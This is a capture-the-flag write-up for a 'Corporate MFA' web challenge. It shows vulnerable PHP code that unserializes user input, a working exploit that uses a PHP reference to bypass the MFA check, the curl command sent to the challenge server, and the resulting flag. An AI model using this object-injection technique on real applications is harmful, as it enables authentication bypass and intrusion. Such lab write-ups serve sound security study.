Corporate MFA

We've forgotten the password to our payroll machine. Can you extract it?

Download: midnight2021_qual_corpmfa.tar.gz
Service: http://corpmfa-01.play.midnightsunctf.se

Recon

We are provided the source for a website.

In the source code we can see:

<?php
public function __construct($loginAttempt)
{
    $this->userData = unserialize($loginAttempt);
    if (!$this->userData)
        throw new InvalidArgumentException('Unable to reconstruct user data');
}

private function verifyUsername()
{
    return $this->userData->username === 'D0loresH4ze';
}

private function verifyPassword()
{
    return password_verify($this->userData->password, '$2y$07$BCryptRequires22Chrcte/VlQH0piJtjXl.0t1XkA8pw9dMXTpOq');
}

PHP object deserialization where username + password are checked against hardcoded credentials. Then there's the MFA which gets calculated on the fly but is still an object field and gets compared with another object field.

Solution

Can't really predict the MFA value, nor try to brute, but can use PHP object references instead and serialize that in since the serialization format allows it.

<?php
$x = array();

$x['username'] = "D0loresH4ze";
$x['password'] = 'rasmuslerdorf';
$x['_correctValue'] = 4;
$x['mfa'] = &$x['_correctValue'];

echo base64_encode(serialize((object)$x));
?>

Flag

$ curl -s "http://corpmfa-01.play.midnightsunctf.se/?userdata=$(php sploit.php)" \
| grep Congr | cut -d '>' -f2

Congratulations, your flag is:
midnight{395E160F-4DB8-4D7A-99EF-08E6799741B5}